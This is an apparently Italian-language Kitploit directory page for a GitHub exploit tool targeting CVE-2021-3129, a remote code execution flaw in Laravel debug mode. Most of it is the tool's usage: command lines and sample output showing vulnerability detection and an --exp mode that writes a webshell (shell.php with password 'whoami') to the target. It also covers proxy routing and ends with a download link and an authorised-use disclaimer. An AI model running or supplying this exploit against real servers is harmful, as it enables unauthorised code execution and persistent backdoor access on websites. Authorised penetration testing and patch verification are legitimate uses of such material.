Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2021-3129-exp — Vulnerabilità RCE in modalità debug di Laravel (CVE-2021-3129) poc / exp | Kitploit
Strumenti/GitHubGitHub/ajisai-babu/cve-2021-3129-exp
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubajisai-babu/cve-2021-3129-exp

CVE-2021-3129-exp

Vulnerabilità RCE in modalità debug di Laravel (CVE-2021-3129) poc / exp

Vedi Repository
1313 anni faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Laravel Debug mode RCE (CVE-2021-3129) poc / exp

CVE-2021-3129 exp / poc

  • Attenzione ⚠️: poiché lo sfruttamento e il rilevamento di questa vulnerabilità inviano più richieste, il processo potrebbe essere lento.
  • usage:
python CVE-2021-3129.py
usage: python CVE-2021-3129.py -u [url] --exp

Laravel Debug mode RCE (CVE-2021-3129) POC & EXP

argomenti opzionali:
  -h, --help            mostra questo messaggio di aiuto ed esce
  -u URL, --url URL     specifica l'URL di destinazione
  -e, --exp             sfrutta la vulnerabilità per scrivere una webshell; se non specificato, esegue solo il rilevamento
  -p PROXY, --proxy PROXY
                        imposta un proxy, ad esempio socks5://127.0.0.1:7890
  • example:
# poc
python CVE-2021-3129.py -u http://xxxxx.com 
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64

# exp
python CVE-2021-3129.py -u http://xxxxx.com --exp                     
[✅]检测到漏洞![🚩]url: http://xxxxx.com [❇️info]PHP版本:7.4.14 网站路径:/var/www/html 服务器地址:172.17.0.2 系统版本:Linux 8e172820ac78 4.4.0-142-generic #168~14.04.1-Ubunt6:28 UTC 2019 x86_64 
[OK] 成功写入webshell, 访问地址 http://xxxxx.com/shell.php , 密码 whoami

# proxy
python CVE-2021-3129.py -u http://xxxxx.com/ -p socks5://127.0.0.1:7890
python CVE-2021-3129.py -u http://xxxxx.com/ --exp -p socks5://127.0.0.1:7890
  • Link di riferimento

    • https://mp.weixin.qq.com/s/k08P2Uij_4ds35FxE2eh0g
    • https://github.com/SecPros-Team/laravel-CVE-2021-3129-EXP
    • https://github.com/nth347/CVE-2021-3129_exploit
    • https://github.com/ambionics/phpggc
  • Note sull'utilizzo

    • Questo strumento è destinato esclusivamente ad attività di sicurezza aziendale legalmente autorizzate. Quando si utilizza questo strumento per il rilevamento, è necessario assicurarsi che l'attività sia conforme alle leggi e ai regolamenti locali e di aver ottenuto le autorizzazioni necessarie.
    • Se si verifica un comportamento illegale durante l'uso di questo strumento, l'utente si assume le conseguenze corrispondenti.
Scarica lo strumento